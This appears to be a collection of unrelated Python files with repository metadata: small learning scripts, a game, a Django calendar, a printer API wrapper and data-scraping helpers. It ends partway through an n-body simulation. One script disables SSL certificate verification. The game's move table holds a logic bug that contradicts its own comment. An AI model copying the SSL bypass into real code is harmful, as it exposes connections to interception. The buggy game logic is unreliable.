print('The trigram for "V" is:', table2["V"])
print()
print('Testing buildEncipheringTable() with key "CHALLENGER"...')
table3 = buildEncipheringTable("CHALLENGER")
print('The trigram for "E" is:', table3["E"])
print('The trigram for "Q" is:', table3["Q"])
print('The trigram for "T" is:', table3["T"])
print()
# Testing Part 2
print('Calling encipher() with message "TOBEORNOTTOBE" and key "HAMLET":', encipher("TOBEORNOTTOBE", "HAMLET"))
print()
print('Calling encipher() with message "SPACETHEFINALFRONTIER" and key "KIRK":', encipher("SPACETHEFINALFRONTIER", "KIRK"))
print()
print('Calling encipher() with message "FOUR SCORE AND SEVEN YEARS AGO" and key "LINCOLN":', encipher("FOUR SCORE AND SEVEN YEARS AGO", "LINCOLN"))
print()
print('Calling encipher() with message "The Helvetii compelled by the want of everything sent ambassadors to him about a surrender" and key "caesar":', encipher("The Helvetii compelled by the want of everything sent ambassadors to him about a surrender", "caesar"))
print()
print('Calling encipher() with message "Alan Turing was a leading participant in the breaking of German ciphers at Bletchley Park" and key "ENIGMA":', encipher("Alan Turing was a leading participant in the breaking of German ciphers at Bletchley Park", "ENIGMA"))
print()
print()
| true |
a14ca55e4a2a2208fd010e3ff30caa0b20e96cba | Python | samdavies1906/Learn2python | /RockPaperScissors.py | UTF-8 | 1,920 | 4.28125 | 4 | [] | no_license | # A rock paper scissors, lizard, spock game using dictionaries dictionaries
import os
import random
# Clear console each run
os.system('cls||clear')
# Dictionary of what moves beat what
winningMoves = {1 : [3,4], #Rock crushes scissors and lizard
2 : [1, 5], #Paper covers rock and disproves spock
3 : [2, 4], #Scissors cuts paper and lizard
4 : [5, 2], #Lizrad poisons spock and eats paper
5 : [2, 5] } #Spock smashes scissors and vaporizes rock
# Move list
# Rock(1), Paper(2), Scissors(3), Lizard(4), Spock(5)
moveListNums = [1,2,3,4,5]
moveListNames = ["rock", "paper", "scissors", "lizard", "spock"]
while True:
try:
bestOf = int(input("Best of how many rounds?: "))
except ValueError:
print("Must enter a number")
continue
else:
break
roundsToWin = (bestOf // 2) + 1
playerScore = 0
computerScore = 0
while playerScore < roundsToWin and computerScore < roundsToWin:
# Player move
while True:
try:
playerMove = int(input("pick Rock(1), Paper(2), Scissors(3), Lizard(4), Spock(5): "))
except ValueError:
print("Must enter a number")
continue
if not playerMove in moveListNums:
print("Must enter a number 1-5")
else:
break
# Computer move
computerMove = random.choice(moveListNums)
print(str(moveListNames[playerMove - 1]) + " VS. " + str(moveListNames[computerMove - 1]))
if computerMove in winningMoves.get(playerMove):
print("You Win!")
playerScore += 1
elif playerMove == computerMove:
print("Its a draw")
else:
print("You lose")
computerScore += 1
print("You: " + str(playerScore) + " Compuer: " + str(computerScore))
if playerScore == roundsToWin:
print("You win!")
else:
print("You Lost, Sadge :(")
| true |
ba8798ae9a8b339a9ad5b6f5eb77ba38e6e52873 | Python | billylu815/test_code | /code3/parsewebdata.py | UTF-8 | 842 | 2.640625 | 3 | [] | no_license | import urllib.request, urllib.parse, urllib.error
import xml.etree.ElementTree as ET
import ssl
# Ignore SSL certificate errors
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
url = 'http://py4e-data.dr-chuck.net/comments_1173076.xml'
print('Retrieving', url)
uh = urllib.request.urlopen(url, context=ctx)
data = uh.read()
print('Retrieved', len(data), 'characters')
#print(data.decode())
tree = ET.fromstring(data)
counts = tree.findall('.//count')
acc = 0
for count in counts:
acc += int(count.text)
print('Count: ',len(counts))
print('Sum: ', acc)
#lat = results.find('comments').find('comment').find('count').text
#print('lat', lat)
#http://py4e-data.dr-chuck.net/comment_42.html
'''
print(results.find('commentinfo').find('comments').find('comment').find('count').text)
''' | true |
2c3cb110720082190edcf6ea0e4731757350d805 | Python | oonisim/python-programs | /lib/util_python/function.py | UTF-8 | 2,634 | 3.390625 | 3 | [] | no_license | """Module for Python function utilities"""
from functools import (
wraps
)
import logging
import random
import time
from typing import (
Callable
)
from util_logging import (
get_logger
)
# --------------------------------------------------------------------------------
# Logging
# --------------------------------------------------------------------------------
_logger: logging.Logger = get_logger(__name__)
# --------------------------------------------------------------------------------
# Utility
# --------------------------------------------------------------------------------
def retry_with_exponential_backoff(
proactive_delay: float = 0.0,
initial_delay: float = 1.0,
exponential_base: float = 2.0,
jitter: bool = True,
max_retries: int = 5,
errors: tuple = (Exception,)
) -> Callable:
"""Retry a function with exponential backoff.
See https://pypi.org/project/backoff/ for PyPi module as an alternative.
Usage:
@retry_with_exponential_backoff(args...)
def func_to_retry():
Args:
proactive_delay: delay before calling the function
initial_delay: initial time in seconds to wait before retry
exponential_base:
jitter:
max_retries: number of retries
errors: errors for which attempt the retry
Return a decorator.
"""
def decorator_factory(func: Callable) -> Callable:
@wraps(func)
def decorator(*args, **kwargs):
num_retries: int = 0
delay: float = initial_delay
# Loop until a successful response or max_retries is hit or an exception is raised
while True:
try:
time.sleep(proactive_delay)
return func(*args, **kwargs)
# Retry on specified errors
except errors as error:
msg: str = f"function {func.__name__}() failed due to [{error}] "
# Increment retries
num_retries += 1
# Check if max retries has been reached
if num_retries > max_retries:
msg += f"and maximum number of retries ({max_retries}) exceeded."
_logger.error("%s", msg)
raise RuntimeError(msg) from error
delay *= exponential_base * (1 + jitter * random.random())
msg += f"and retry in {delay} seconds."
_logger.error(msg)
time.sleep(delay)
return decorator
return decorator_factory
| true |
444c692686a5b946293c82214365504f62d99e7f | Python | YimRegister/VGD | /popup_permanent.py | UTF-8 | 402 | 2.625 | 3 | [] | no_license | import pygame
pygame.init()
from vgd import wait_until_quit
screen_width = 800
screen_height = 600
black = (0,0,0)
main_surface = pygame.display.set_mode((screen_width, screen_height))
pygame.display.set_caption("Title goes here")
main_surface.fill((255,255,100))
pygame.draw.rect(main_surface, black, (screen_width,screen_height,30,40))
pygame.display.update()
wait_until_quit()
pygame.quit()
| true |
bb1e6feb5ddf0ae8be689f6c482a9d27bf573ca1 | Python | NayantaraPrem/EthereumPricePrediction | /data_collection_tools.py | UTF-8 | 7,338 | 3.03125 | 3 | [
"MIT"
] | permissive | # -*- coding: utf-8 -*-
"""
Created on Tue Nov 19 23:46:38 2019
@author: Tara Prem
This module contains helper functions for collecting data for the project
"""
import pytrends.dailydata as dd
import matplotlib.pyplot as plt
from datetime import datetime
import pandas as pd
import requests
from bs4 import BeautifulSoup
from getpass import getpass
import os
import re
import numpy as np
def download_daily_google_trends(keyword, start_year, start_month, end_year, end_month):
"""
Query for and aggregate daily google search trends data for 'keyword' and
download it as a CSV named 'google_trends_{keyword}_{timestamp}.csv'
Args:
keyword: (str) word to search for
start)year: (int) returning trends starting from this year (and month)
start_month: (int) returning trends starting from this (year and) month
end_year: (int) returning trends ending at this year (and month)
end_month: (int) returning trends ending at this (year and) month
Returns:
None
Examples:
download_daily_google_trends(keyword = 'ethereum', start_year=2015, start_month=7, end_year=2019, end_month=11)
"""
#API doc and math explained: https://github.com/GeneralMills/pytrends/blob/master/pytrends/dailydata.py
df_daily = dd.get_daily_data(keyword, start_year, start_month, end_year, end_month)
print(df_daily.tail(31))
# plotting the data per month obtained from Google
plt.plot(df_daily.index, df_daily[f"{keyword}_monthly"])
plt.autoscale(enable=True, axis='x', tight=True)
plt.title(f"Google trends (monthly data): {keyword}")
plt.grid(True)
plt.show()
#plotting the daily data rescaled from the monthly data and the data in a month month 'APIs'
plt.plot(df_daily.index, df_daily[f"{keyword}"])
plt.autoscale(enable=True, axis='x', tight=True)
plt.title(f"Google trends(rescaled to make the daily data comparable): {keyword}")
plt.grid(True)
plt.show()
#download CSV of the dt
timestamp = int(datetime.timestamp(datetime.now()))
filename = f"google_trends_{keyword}_{timestamp}.csv"
df_daily.to_csv(filename)
return
def _parse_bitinfo_graph_record(record):
date = record[11:21]
value = record[24:-1]
return np.array([date,value])
def download_bitinfo_graph_data(url, column_name):
"""
Scrape and aggregate data from the graphs at bitinfocharts.com into
CSV named '{column_name}_{timestamp}.csv'
Args:
url: (str) URL to a graph at bitinfocharts.com
column_name: (str) Name to assign the CSV file and column
Returns:
None
Examples:
download_bitinfo_graph_data(url='https://bitinfocharts.com/comparison/ethereum-tweets.html', column_name='ethereum_tweet_count')
"""
response = requests.get(url)
script_text = BeautifulSoup(response.text,'lxml').findAll('script')[5].text
pattern = re.compile(r'\[new Date\("\d{4}/\d{2}/\d{2}"\),\d*\w*\]')
records = pattern.findall(script_text)
transactions = np.empty((0,2))
for record in records:
transactions = np.vstack((transactions, _parse_bitinfo_graph_record(record)))
df_tweet = pd.DataFrame(transactions[:,1], index=transactions[:,0], columns=[f"{column_name}"])
df_tweet.index = pd.to_datetime(df_tweet.index)
print(df_tweet.tail(3))
#plot the column_name count
plt.plot(df_tweet.index, df_tweet[f"{column_name}"])
plt.yscale('log')
plt.title(f"{column_name}")
plt.grid(True)
#download CSV
timestamp = int(datetime.timestamp(datetime.now()))
filename = f"{column_name}_{timestamp}.csv"
df_tweet.to_csv(filename)
def _format_exchange_data(rows):
df = pd.DataFrame(rows[1:][:], columns = ["address", "name", "balance", "txn_count"]) # discard first empty row
df['balance'] = df['balance'].apply(lambda str: float(str.strip(" Ether").replace(",", "")))
df['txn_count'] = df['txn_count'].apply(lambda str: float(str.replace(",", "")))
return df
def scrape_exchanges():
"""
Scrapes etherscan for all the data on all the exchange addresses
Return:
(pd.DataFrame) DF with columns "address", "name", "balance", "txn count"
"""
page_number = 1
page_limit=100
exchanges = []
while True:
url = f"https://etherscan.io/accounts/label/exchange/{page_number}?ps={page_limit}"
print(f"Requesting {url}")
agent = {"User-Agent":'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0'}
page = requests.get(url, headers=agent).text
table = BeautifulSoup(page, 'html.parser').find('table')
rows = [[item.text.strip() for item in row.find_all('td')] for row in table.find_all('tr')]
if (len(rows) <= 2):
# no more data
break
exchanges.append(_format_exchange_data(rows))
page_number+=1
exchanges = pd.concat(exchanges)
print(exchanges.head())
print(exchanges.count())
print(exchanges.describe())
return exchanges
def filter_top_exchange_addresses(exhanges_df, min_balance = 2000, min_txn_count = 400000):
"""
Filter exchanges with balance > min_balance and transaction count > min_txn_count
Args:
exchanges_df: (pd.Dataframe) Exchanges with atleast columns 'balance'(float), 'txn_count'(float) and 'address' (str)
min_balance: (int) filter exchanges by balance > min_balance AND
min_txn_count: (int) filter exchanges by txn count > min_txn_count
Return:
(pd.Dataframe) of addresses
Examples:
df = scrape_exchanges()
filter_top_exchange_addresses(df)
"""
balance_condition = exhanges_df['balance'] > min_balance
txn_condition = exhanges_df['txn_count'] > min_txn_count
return exhanges_df[balance_condition & txn_condition]['address']
def get_txn_history(addresses, api_key = None, offset = 5000):
"""
Returns all the historical transactions made to/from the input address.
NOTE: there is a rate limit of 5 requests/sec for EtherScan.
Args:
addresses: (pd.DataFrame) addresses to return txns for
api_key: (str) EtherScan.io API key. If None, will be prompted to enter one.
Return:
(dictionary of pd.DataFrame) DataFrames of transactions keyed by address of the transactions
Examples:
df = scrape_exchanges()
df = filter_top_exchange_addresses(df)
get_txn_history(df)
"""
if (api_key is None):
api_key = getpass('Enter EtherScan.io API Key: ')
txns_by_address = {}
for address in addresses:
page = 1
txns = []
while (page*offset <= 10000): # etherscan.io only maintains the last 10,000 txns
api = f"https://api.etherscan.io/api?module=account&action=txlist&address={address}&page={page}&offset={offset}&sort=asc&apikey={api_key}"
response = requests.get(api)
if (response.json()['status'] != '1'):
print(f"Failed API call: {response.json()['result']}; {response.json()['message']}")
break
print(f"page {page} @ {address}")
txns.append(pd.DataFrame(response.json()['result']))
page += 1
txns_by_address[address] = pd.concat(txns)
return txns_by_address
| true |
68295bab3f9be6a82669c77ecaea4b4e32e81662 | Python | manlan2/xndian | /deploy/api/printer_api.py | UTF-8 | 5,094 | 2.84375 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib
import urllib2
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
sys.path.append("..")
# 说明:
# 1.把注释的方法打开,即可测试
# 2.PRINTER_SN打印机编号9位,查看飞鹅打印机底部贴纸上面的打印机编号
# 3.KEY,去飞鹅打印机官方网站 www.feieyun.com 注册帐号,添加打印机编号,自动生成KEY
def print_order(order_content, order_time):
import common
params = {
'sn': common.PRINTER_SN,
'key': common.KEY,
'printContent': order_content,
'times': str(order_time)
}
encodedata = urllib.urlencode(params)
strurl = common.IP + common.HOSTNAME + "/printOrderAction"
req = urllib2.Request(url=strurl, data=encodedata)
res = urllib2.urlopen(req).read().decode('utf-8')
return res
# ====================方法一:打印订单=======================
# ***服务器返回值有如下几种***
# {"responseCode":0,"msg":"服务器接收订单成功","orderindex":"xxxxxxxxxxxxxxxxxx"}
# {"responseCode":1,"msg":"打印机编号错误"};
# {"responseCode":2,"msg":"服务器处理订单失败"};
# {"responseCode":3,"msg":"打印内容太长"};
# {"responseCode":4,"msg":"请求参数错误"};
#
# 标签说明:"<BR>"为换行符,"<CB></CB>"为居中放大,"<B></B>"为放大,"<C></C>"为居中,"<L></L>"为字体变高,"<QR></QR>"为二维码
# 参数说明sn:打印机编号;key:打印密钥;printContent:(打印)订单内容;times:打印联(次)数
# 方法开始
# content = "<CB>测试打印</CB><BR>"
# content += "名称 单价 数量 金额<BR>"
# content += "--------------------------------<BR>"
# content += "饭 1.0 1 1.0<BR>"
# content += "炒饭 10.0 10 10.0<BR>"
# content += "蛋炒饭 10.0 10 100.0<BR>"
# content += "鸡蛋炒饭 100.0 1 100.0<BR>"
# content += "番茄蛋炒饭 1000.0 1 100.0<BR>"
# content += "西红柿蛋炒饭 1000.0 1 100.0<BR>"
# content += "西红柿鸡蛋炒饭 100.0 10 100.0<BR>"
# content += "<QR>http://www.dzist.com</QR>"
#
# params = {
# 'sn':PRINTER_SN,
# 'key':KEY,
# 'printContent':content,
# 'times':'1'
# }
# encodedata = urllib.urlencode(params)
# strurl = IP+HOSTNAME+"/printOrderAction"
# req = urllib2.Request(url = strurl,data =encodedata)
# res = urllib2.urlopen(req).read().decode('utf-8')
# print res
# 方法结束 =================================================
# ===============方法二:查询某订单是否打印成功===============
# ***服务器返回的状态有如下几种***
# {"responseCode":0,"msg":"已打印"};
# {"responseCode":0,"msg":"未打印"};
# {"responseCode":1,"msg":"请求参数错误"};
# {"responseCode":2,"msg":"没有找到该索引的订单"};
#
# 参数说明sn:打印机编号;key:打印密钥;index:订单索引,从方法1返回值中获取
# 方法开始
# params = {
# 'sn':PRINTER_SN,
# 'key':KEY,
# 'index':"1425701882784926118661",
# }
# encodedata = urllib.urlencode(params)
# strurl = IP+HOSTNAME+"/queryOrderStateAction"
# req = urllib2.Request(url = strurl,data =encodedata)
# res = urllib2.urlopen(req).read().decode('utf-8')
# print res
# 方法结束=================================================
# =================方法三:查询指定打印机某天的订单详情=============
# ***服务器返回的状态有如下几种(print:已打印,waiting:未打印)***
# {"responseCode":0,"print":"xx","waiting":"xx"};
# {"responseCode":1,"msg":"请求参数错误"};
#
# 参数说明sn:打印机编号;key:打印密钥;date:日期,注意时间格式为"2015-01-01"
# 方法开始
# params = {
# 'sn':PRINTER_SN,
# 'key':KEY,
# 'date':"2015-01-31",
# }
# encodedata = urllib.urlencode(params)
# strurl = IP+HOSTNAME+"/queryOrderInfoAction"
# req = urllib2.Request(url = strurl,data =encodedata)
# res = urllib2.urlopen(req).read().decode('utf-8')
# print res
# 方法结束=================================================
# ==================方法四:查询打印机的状态====================
# ***服务器返回的状态有如下几种(print:已打印,waiting:未打印)***
# {"responseCode":0,"msg":"离线"};
# {"responseCode":0,"msg":"在线,纸张正常"};
# {"responseCode":0,"msg":"在线,缺纸"};
# {"responseCode":1,"msg":"请求参数错误"};
#
# 参数说明sn:打印机编号;key:打印密钥;
# 方法开始
# params = {
# 'sn': common.PRINTER_SN,
# 'key': common.KEY,
# }
# encodedata = urllib.urlencode(params)
# strurl = common.IP + common.HOSTNAME + "/queryPrinterStatusAction"
# req = urllib2.Request(url=strurl, data=encodedata)
# res = urllib2.urlopen(req).read().decode('utf-8')
# print res
# 方法结束=================================================
| true |
ac46a0aac127f1a293c8336c8a025a0174fc9c6e | Python | charmguitar/djangoapp | /scalendar/views.py | UTF-8 | 6,557 | 3.375 | 3 | [] | no_license | import calendar
from collections import deque
import datetime
from .models import Schedule
#ここで、カレンダーについて定義
class BaseCalendarMixin:
#カレンダー関連の、基底クラス
first_weekday = 0 # 0は月曜から、1は火曜から。6なら日曜日からになります。お望みなら、継承したビューで指定してください。
week_names = ['月', '火', '水', '木', '金', '土', '日'] # これは、月曜日から書くことを想定します。
def setup(self):
#コンストラクタ.カレンダーの基底クラスのインスタンス作成時に何曜日から始まるかを決めて,importしたcalendarを利用し、インスタンスを生成
self._calendar = calendar.Calendar(self.first_weekday)
def get_week_names(self):
#first_weekday(最初に表示される曜日)にあわせて、week_namesをシフトする
#week_namesをキューの順に格納し、指定の回数分ローテーションすることで、最初の曜日が決まる。
week_names = deque(self.week_names)
week_names.rotate(-self.first_weekday)
return week_names
#以降、importしたdatetimeを利用し、年月日を取得している.
class MonthCalendarMixin(BaseCalendarMixin):
#月間カレンダー
@staticmethod
def get_previous_month(date):
#前月を返す.1月だけ年が変わるので分岐
if date.month == 1:
return date.replace(year=date.year-1, month=12, day=1)
else:
return date.replace(month=date.month-1, day=1)
@staticmethod
def get_next_month(date):
#次月を返す.12月だけ年が変わるので分岐
if date.month == 12:
return date.replace(year=date.year+1, month=1, day=1)
else:
return date.replace(month=date.month+1, day=1)
def get_month_days(self, date):
#その月の全ての日を返す
return self._calendar.monthdatescalendar(date.year, date.month)
def get_current_month(self):
#現在の月(ただし、urlで指定された月を示すので、今月とは限らない.)を返す
month = self.kwargs.get('month') #self.kwargsはurlのプロパティ(id?)から取得している.
year = self.kwargs.get('year')
if month and year:
month = datetime.date(year=int(year), month=int(month), day=1)
else:
month = datetime.date.today().replace(day=1)
return month
def get_month_calendar(self):
#月間カレンダー情報の入った辞書を返す
self.setup()
current_month = self.get_current_month()
calendar_data = {
'now': datetime.date.today(),
'days': self.get_month_days(current_month),
'current': current_month,
'previous': self.get_previous_month(current_month),
'next': self.get_next_month(current_month),
'week_names': self.get_week_names(),
}
return calendar_data
class WeekCalendarMixin(BaseCalendarMixin):
#週間カレンダーの機能を提供するMixin
def get_week_days(self):
#その週の日を全て返す
month = self.kwargs.get('month')
year = self.kwargs.get('year')
day = self.kwargs.get('day')
if month and year and day:
date = datetime.date(year=int(year), month=int(month), day=int(day))
else:
date = datetime.date.today().replace(day=1)
for week in self._calendar.monthdatescalendar(date.year, date.month):
if date in week:
return week
def get_week_calendar(self):
#週間カレンダー情報の入った辞書を返す
self.setup()
days = self.get_week_days()
first = days[0]
last = days[-1]
calendar_data = {
'now': datetime.date.today(),
'days': days,
'previous': first - datetime.timedelta(days=7),
'next': first + datetime.timedelta(days=7),
'week_names': self.get_week_names(),
'first': first,
'last': last,
}
return calendar_data
class WeekWithScheduleMixin(WeekCalendarMixin):
#スケジュール付きの、週間カレンダーを提供するMixin
model = Schedule
date_field = 'date'
order_field = 'start_time'
def get_week_schedules(self, days):
llist = list(range(7))
for day in days:
lookup = {self.date_field: day}
queryset = self.model.objects.filter(**lookup)
if self.order_field:
llist.append(queryset.order_by(self.order_field))
return llist
#それぞれの日のスケジュールを返す.それぞれの日付の予定をyeildによって個別に渡している.
"""
for day in days:
lookup = {self.date_field: day}
queryset = self.model.objects.filter(**lookup)
if self.order_field:
queryset = queryset.order_by(self.order_field)
yield queryset
"""
def get_week_calendar(self):
calendar_data = super().get_week_calendar()
schedules = self.get_week_schedules(calendar_data['days'])
calendar_data['schedule_list'] = schedules
return calendar_data
#以降は使っていないクラス.
"""
class MonthWithScheduleMixin(MonthCalendarMixin):
#スケジュール付きの、月間カレンダーを提供するMixin
model = Schedule
date_field = 'date'
order_field = 'start_time'
def get_month_schedules(self, days):
#(日付, その日のスケジュール)なリストを返す
day_with_schedules = []
for week in days:
week_list = []
for day in week:
lookup = {self.date_field: day}
queryset = self.model.objects.filter(**lookup)
if self.order_field:
queryset = queryset.order_by(self.order_field)
week_list.append(
(day, queryset)
)
day_with_schedules.append(week_list)
return day_with_schedules
def get_month_calendar(self):
calendar_data = super().get_month_calendar()
day_with_schedules = self.get_month_schedules(calendar_data['days'])
calendar_data['days'] = day_with_schedules
return calendar_data
"""
| true |
32234486b9190af85d7f2e1f41e6f92ee87c414f | Python | nathanbreitsch/Columns-And-Buckets | /data/parser.py | UTF-8 | 2,692 | 2.875 | 3 | [] | no_license | import json
def make_csv():
file = open("transcript.txt","r")
text = file.read()
file.close()
#get rid of double newlines
#while "\n\n" in text:
# text = text.replace("\n\n", "\n")
text = text.replace("\n", ' ')
#remove all commas
for undesirable in [',','.',';','?', '-']:
while undesirable in text:
text = text.replace(undesirable, " ")
#replace colons with commas
#text = text.replace(":",",")
#replace all prompts
for prompt in [
"BUSH",
"TAPPER",
"PAUL",
"HUCKABEE",
"RUBIO",
"TRUMP",
"CRUZ",
"CARSON",
"WALKER",
"FIORINA",
"KASICH",
"CHRISTIE"
]:
text = text.replace(prompt + ':', '\n' + prompt + ',')
file = open("better.csv", "w")
file.write(text)
file.close()
def make_json():
file = open("better.csv", "r")
out_records = []
index = 0
for line in file.readlines():
(name, passage) = line.split(',')
out_records.append({
'name': name,
'passage': passage,
'index': index
})
index += 1
file.close()
file = open("debate.json", "w")
file.write(json.dumps(out_records))
file.close()
def make_json_whitelist(whitelist, filename):
whitelist = map(lambda x: x.upper().strip(), whitelist)
file = open("better.csv", "r")
out_records = []
index = 0
for line in file.readlines():
(name, passage) = line.split(',')
passage_words = passage.split(' ')
passage_words = map(lambda x: x.upper().strip(), passage_words)
passage_words = filter(lambda x: x in whitelist, passage_words)
print(passage_words)
passage = " ".join(passage_words)
out_records.append({
'name': name,
'passage': passage,
'index': index
})
index += 1
file.close()
file = open(filename, "w")
file.write(json.dumps(out_records))
file.close()
if __name__ == '__main__':
#make_csv()
#make_json()
#whitelist = ["Iraq", "Change", "Economy", "Business", "Change", "jobs", "reform", 'god', 'character', 'disgusting', 'obama', 'obamacare', 'healthcare', 'family', 'tax', 'liberal', 'conservative', 'war', 'syria','china', 'oil']
#make_json_whitelist(whitelist, "debate-whitelist.json")
whitelist = [
"BUSH",
"TAPPER",
"PAUL",
"HUCKABEE",
"RUBIO",
"TRUMP",
"CRUZ",
"CARSON",
"WALKER",
"FIORINA",
"KASICH",
"CHRISTIE"
]
make_json_whitelist(whitelist, "debate-gossip.json")
| true |
ee33627ed678769e59fd85db4de7aedb06d3e06b | Python | renataeva/python-basics | /lists/moving.py | UTF-8 | 147 | 3.21875 | 3 | [
"Apache-2.0"
] | permissive | def move(seq):
seq = [*seq[2:], *seq[0:2]]
return seq
numbers = [1, 2, 3, 4, 5]
r = move(numbers)
print(r)
assert r == [3, 4, 5, 1, 2]
| true |
3318356046423595707edeb292f2f9fe6623ee27 | Python | Riksi/Emov | /movies/cofi.py | UTF-8 | 3,396 | 2.65625 | 3 | [] | no_license | import numpy as np
class Cofi:
def __init__(self,
Y,
R,
num_features,
num_recms = 10,
lmd = 10,
alpha=0.001,
num_iters = 500,
user = None,
debug = False,
normalize = True,
debugGD = False):
self.num_features = num_features
self.Y = Y
self.R = R
self.num_movies,self.num_users = self.Y.shape
self.Y_mean = np.zeros((self.num_movies,1))
if debug:
self.X = np.loadtxt('x_test.txt')
self.T = np.loadtxt('t_test.txt')
else:
self.X = np.random.randn(self.num_movies,self.num_features)
self.T = np.random.randn(self.num_users,self.num_features)
self.lmd = lmd
self.alpha = alpha
self.num_recms = num_recms
self.num_iters = num_iters
self.normalize = normalize
self.debugGD = debugGD
self.user = user or self.num_users
def compute_cost(self,params):
X,T= self.reshape_params(params)
J = 0.5*self.sum2(self.cost_term(X,T,2))\
+0.5*self.lmd*(self.sum2(T**2)
+self.sum2(X**2))
return J
def sum2(self,M):
return np.sum(np.sum(M))
def cost_term(self,X,T,power=1):
return ((X.dot(T.T) - self.Y)**power)*self.R
def cost_grad(self,params):
X,T = self.reshape_params(params)
grad_term = self.cost_term(X,T)
grad_X = grad_term.dot(T) + self.lmd*X
grad_T = (grad_term.T).dot(X) + self.lmd*T
return self.unroll_params(grad_X,grad_T)
def reshape_params(self,params):
m,u,f = self.num_movies,self.num_users,self.num_features
x = params[0:m*f].reshape((m,f),order='F');
t = params[m*f:].reshape((u,f),order='F');
return x,t
def unroll_params(self,x,t):
return np.concatenate((x.flatten(order='F'),t.flatten(order='F')),axis=0)
def mean_normalize(self):
for i in range(0,self.num_movies):
idx = np.where(self.R[i,:]==1)
self.Y_mean[i,:] = np.mean(self.Y[i,idx])
self.Y[i,idx]-=self.Y_mean[i,:]
def grad_desc(self,params):
for i in range(0,self.num_iters):
if self.debugGD:
print('Iteration: %s, Cost: %s'%(str(i),str(self.compute_cost(params))))
params = params - self.alpha*self.cost_grad(params)
return params
def calculate_params(self):
if self.normalize:
self.mean_normalize()
params = self.grad_desc(self.unroll_params(self.X,self.T))
self.X,self.T = self.reshape_params(params)
def predict(self):
self.predictions = self.X.dot(self.T.T) + self.Y_mean
def recommend(self):
self.calculate_params()
self.predict()
real_preds = self.predictions[:,self.user-1:self.user]*(self.R[:,self.user-1:self.user]!=1)
movie_inds = [i for i in range(0,self.num_movies)]
movie_inds.sort(key = lambda ind: real_preds[ind,:], reverse = True)
movie_ids = list(map(lambda ind:ind+1,movie_inds))
self.preds = real_preds
return movie_ids[:self.num_recms]
| true |
d2770ed3fc138a972f754dfb32fab49d52f4e193 | Python | Aasthaengg/IBMdataset | /Python_codes/p03761/s091827333.py | UTF-8 | 131 | 3 | 3 | [] | no_license | n = int(input())
S = [input() for _ in range(n)]
for c in map(chr, range(97+123)):
print(c*min(s.count(c) for s in S), end='')
| true |
44eaf107d0a29ac9791045ce3f62bb52789fc6f3 | Python | harshit98/Retail-Updates-Streamer | /es_request_handler.py | UTF-8 | 1,237 | 2.90625 | 3 | [
"Apache-2.0"
] | permissive | import asyncio
import time
from datastore.main import ElasticsearchRequestHandler
es = ElasticsearchRequestHandler()
async def main():
# get single document
product_id = 10
print(f"product having id {product_id}: {await es.get(product_id)}")
# get multiple documents having stock greater than 0
query = {
"query": {
"bool": {
"must": {
"range": {
"product.stock": {
"gt": 6
}
}
}
}
}
}
print(f"products having stock > 6 :: {await es.search(query)}")
# update price of product with id = 200
resp = await es.get(product_id)
product = resp.get('_source').get('product')
print(f"product price before update {product['price']}")
product['price'] = 8.5
print(f"product price after update {product['price']}")
update = await es.update(product, product_id)
if update:
print(f"product updated successfully")
else:
print(f"product update failed")
# close ES connection
await es.close_connection()
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
| true |
bfff4f70a9878de559700b5b455ab4217cdd590b | Python | fehbrize/what-to-wear | /main.py | UTF-8 | 934 | 3.140625 | 3 | [] | no_license | import json
import requests;
def retrieve_coordinates(zipcode):
req = requests.request('GET', 'http://api.openweathermap.org/geo/1.0/zip?zip=' + zipcode + ',US&appid=ce3cc47717e5e'
'239c048e33936caa91e')
return json.loads(req.content)
def retrieve_weather(lat, long):
req = requests.request('GET', 'https://api.openweathermap.org/data/2.5/onecall?lat=' + lat + '&lon=' + long +
'&units=imperial&exclude=minutely,alerts&appid=ce3cc47717e5e239c048e33936caa91e')
parsed_req = json.loads(req.content)
print(parsed_req['current'])
# Press the green button in the gutter to run the script.
if __name__ == '__main__':
location = retrieve_coordinates('14623')
retrieve_weather(str(location['lat']), str(location['lon']))
# See PyCharm help at https://www.jetbrains.com/help/pycharm/
| true |
e667561355f9635fa9f59700d7ea5b0c3d360cf2 | Python | nyu-cds/asn264_assignment3 | /nbody_opt.py | UTF-8 | 4,152 | 2.78125 | 3 | [] | no_license | """
N-body simulation.
Aditi Nair (asn264)
Feb 10 2016
In this script, I combine all of the optimizations from earlier experiments.
TIME: 38.4250359535 SECONDS
RELATIVE SPEEDUP = 146.724272966/38.4250359535 ~= 3.8
"""
# Initial state of the five simulated bodies.
# Each entry maps a body name to a (position, velocity, mass) triple:
#   position -- [x, y, z] list, mutated in place by advance()
#   velocity -- [vx, vy, vz] list, mutated in place by advance() and
#               offset_momentum()
#   mass     -- scalar
# NOTE(review): the sun's mass is 39.47841760435743 == 4*pi**2, which matches
# the classic n-body benchmark's unit system (AU / years, G = 1) -- confirm
# against the original benchmark before relying on the units.
BODIES = {
    'sun': ([0.0, 0.0, 0.0], [0.0, 0.0, 0.0], 39.47841760435743),
    'jupiter': ([4.84143144246472090e+00,
                 -1.16032004402742839e+00,
                 -1.03622044471123109e-01],
                [0.606326392995832,
                 2.81198684491626,
                 -0.02521836165988763],
                0.03769367487038949),
    'saturn': ([8.34336671824457987e+00,
                4.12479856412430479e+00,
                -4.03523417114321381e-01],
               [-1.0107743461787924,
                1.8256623712304119,
                0.008415761376584154],
               0.011286326131968767),
    'uranus': ([1.28943695621391310e+01,
                -1.51111514016986312e+01,
                -2.23307578892655734e-01],
               [1.0827910064415354,
                0.8687130181696082,
                -0.010832637401363636],
               0.0017237240570597112),
    'neptune': ([1.53796971148509165e+01,
                -2.59193146099879641e+01,
                1.79258772950371181e-01],
                [0.979090732243898,
                 0.5946989986476762,
                 -0.034755955504078104],
                0.0020336868699246304)}

# Fixed iteration order over BODIES, precomputed once so the hot loops avoid
# repeated .keys() calls (part of this file's optimization experiment).
BODIES_KEYS = ['sun', 'jupiter', 'saturn', 'uranus', 'neptune']
def advance(BODIES, BODIES_KEYS, dt, iterations):
    '''
    Advance the whole system by `iterations` timesteps of size `dt`.

    Mutates the position and velocity lists stored in BODIES in place.
    Each unordered pair of bodies is visited exactly once per step.
    '''
    for _ in range(iterations):
        # Kick: pairwise velocity updates from mutual gravitational pull.
